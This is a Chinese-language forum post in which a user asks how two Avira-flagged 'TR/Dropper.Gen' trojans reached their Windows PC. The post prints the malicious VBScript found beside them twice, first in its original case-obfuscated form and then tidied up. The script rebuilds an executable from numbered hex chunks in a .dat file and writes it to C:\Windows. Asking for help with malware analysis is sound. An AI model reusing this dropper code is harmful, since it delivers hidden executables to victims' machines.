防毒軟體:Avira Free Antivirus 14.0.7.342
剛剛無預警的掃描到兩隻病毒,這段期間都在瀏覽網頁,有沒有鄉民可以看出,
這兩隻病毒是透過什麼管道進來的,假設中鏢會影響哪些層面。謝謝
C:\Windows\871252.exe [偵測] 是 TR/Dropper.Gen 特洛伊木馬程式
C:\Windows\611620.exe [偵測] 是 TR/Dropper.Gen 特洛伊木馬程式
隔離後去該路徑下發現同檔名有兩隻
611620.vbs 611620.dat 871252.vbs 871252.dat
vbs內容如下
oN ErRoR rEsuME next:V=1515:SeT
q=cReATEobjeCt("SCRIptiNG.fILesystEMoBJecT"):Do WhILE
Q.fILeexISts("C:\windows\871252.dat")=faLse:WscRIpt.SleEP(776):lOop:Do:set
H=q.OPENTexTfIle("C:\windows\871252.dat",1):Do wHILe
h.AtenDofsTreAm=fAlSe:R=h.REaDLIne:D=LEn(r):X=left(r,4):sELECt casE trUe:caSE
IsnuMeriC(X)=FalsE:case D=3982 aNd x=CSTr(V):J=j+MiD(R,5,3977):v=V+1:cAsE
D=3951 ANd x=CstR(V):j=J+mID(R,5,3946):V=v+1:enD SELECT:LOOP:H.closE:If
1618=v THen:C=lEN(j)/2:sEt e=CReAteoBJeCT("aDoDB.reCoRdseT"):E.FIeLDS.APpEnd
"M",205,C:E.OpeN:e.adDNew:e.updaTe:e("m")=j:set
Z=CreaTeobjECT("AdOdB.stReAm"):WITh z:.MODE=3:.TYPe=1:.open():.WRite
E("M").geTChuNk(c):.savetofiLE "C:\windows\871252.exe",2:END
With:wSCRIPT.quiT:eND if:WsCrIpT.slEep(481):LOop
自己重新整理過內容應該會比較好分析
on error resume next
v=1515
set q=createobject("scripting.filesystemobject")
do while q.fileexists("c:\windows\871252.dat")=false
wscript.sleep(776)
loop
do
set h=q.opentextfile("c:\windows\871252.dat",1)
do while h.atendofstream=false
r=h.readline
d=len(r)
x=left(r,4)
select case true
case isnumeric(x)=false
case d=3982 and x=cstr(v)
j=j+mid(r,5,3977)
v=v+1
case d=3951 and x=cstr(v)
j=j+mid(r,5,3946)
v=v+1
end select
loop
h.close
if 1618=v then
c=len(j)/2
set e=createobject("adodb.recordset")
e.fields.append "m",205,c
e.open
e.addnew
e.update
e("m")=j
set z=createobject("adodb.stream")
with z
.mode=3
.type=1
.open()
.write e("m").getchunk(c)
.savetofile "c:\windows\871252.exe",2
end with
wscript.quit
end if
wscript.sleep(481)
loop